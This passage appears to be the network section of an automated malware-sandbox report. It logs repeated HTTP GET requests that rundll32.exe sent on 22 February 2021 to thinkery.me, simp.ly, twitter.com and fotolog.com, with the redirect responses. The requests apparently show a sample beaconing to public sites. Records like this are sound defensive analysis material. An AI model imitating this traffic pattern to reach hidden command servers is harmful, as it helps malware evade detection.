                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8446c100004c74b5843000000001
                                                                                                                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HDx%2Bm%2FksiLKXzA4b%2BaBfN1fNCoaKjnagplykRF6Bw1icQT7lTY0nFruXTe4qcpQfmt8%2F0IgQI3Sm%2BhK51ciOZM%2F%2FX5lF5n7caFiY%2FSU5H4o%3D"}]}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3cb79dfc4c74-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                8192.168.2.6497445.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:06.558867931 CET1524OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:06.631048918 CET1524INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:06 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                80192.168.2.6499255.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:25.173815012 CET7182OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:25.245045900 CET7182INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:25 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                81192.168.2.649927192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:26.118748903 CET7193OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:26.286358118 CET7199INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:26 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                82192.168.2.649931104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:27.022231102 CET7218OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:27.184803009 CET7218INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:27 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_x6XQ/q59J3n0PHe1X4peOA=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:27 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403392712153952; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:27 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: c18b6415595cb3aba0f20425b2f7dcba
                                                                                                                                                x-response-time: 104


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                83192.168.2.649934172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:28.006628990 CET7230OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:28.981693983 CET7230INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:28 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:28 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d84576c00000c853209e000000001
                                                                                                                                                Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=e%2Fzut1F6MA6gSXmBwrfHi9B2voGrV9qexUMNXOSf%2F6UYcz%2FNxOxEVzVoEvbOUNZJD8fvTV3CTRKfU7cjc7KENgrQ3AgvvSnxz%2FBqg05%2ByCg%3D"}]}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3cd24b5f0c85-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                84192.168.2.6499365.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:29.863601923 CET7277OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:29.936273098 CET7278INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:29 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                85192.168.2.649938192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:30.703121901 CET7289OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:30.867166996 CET7289INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:30 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                86192.168.2.649940104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:31.503077030 CET7298OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:31.668314934 CET7298INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:31 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_Y2fN66MYvLYZfPcwJ8woXg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:31 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403393160622742; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:31 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 40760c57cf3dd80168666610af1aeaab
                                                                                                                                                x-response-time: 107


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                87192.168.2.649944172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:32.349935055 CET7310OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:32.792937040 CET7311INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:32 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:32 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d84686500004bf4109c2000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xGH3CB73by6iKu2bjsZ2qoU5jCzGxlWuDPAs9Gt468YbULcq6Ze58X7NdEFkGlcwdUP%2BJW3%2FkX3gAD0T2aYxqv%2FAoquxOhIrGeMFnam2teM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3ced68104bf4-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                88192.168.2.6499475.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:33.914396048 CET7360OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:33.985619068 CET7360INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:33 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                89192.168.2.649950192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:34.754955053 CET7381OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:34.924387932 CET7381INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:34 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                9192.168.2.649746192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:07.394818068 CET1548OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:07.566083908 CET1548INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:07 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                90192.168.2.649952104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:35.570074081 CET7390OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:35.737271070 CET7390INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:35 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_TXJ3aDCtdIyHNlr7cqkFIA=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:35 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403393567372228; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:35 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 5a0299553e8ae39df6d49e9f8713ec70
                                                                                                                                                x-response-time: 109


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                91192.168.2.649955172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:36.417643070 CET7402OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:37.004746914 CET7403INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:36 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:36 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d84784700001f740a017000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Mf2DcKmBgsxFK0Si3B5C0ZvoTvqXEz%2F293nosl6Sjj5A%2BJd2WYtj8DfXN8TR0fV%2BL1bOISz76zBFEX4S%2BHJ9KkEL0cqmGK2kMURtcB6s2mE%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3d06d9451f74-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                92192.168.2.6499575.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:37.938002110 CET7449OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:38.007668972 CET7450INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                93192.168.2.649959192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:38.763400078 CET7461OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:38.931960106 CET7461INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:38 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                94192.168.2.649961104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:39.565201998 CET7470OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:39.734961987 CET7471INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:39 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_iIb8QrmSFlpnui9jqmTvEg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:39 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403393966644646; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:39 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 1b85d8a713966acf952518da728d723c
                                                                                                                                                x-response-time: 113


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
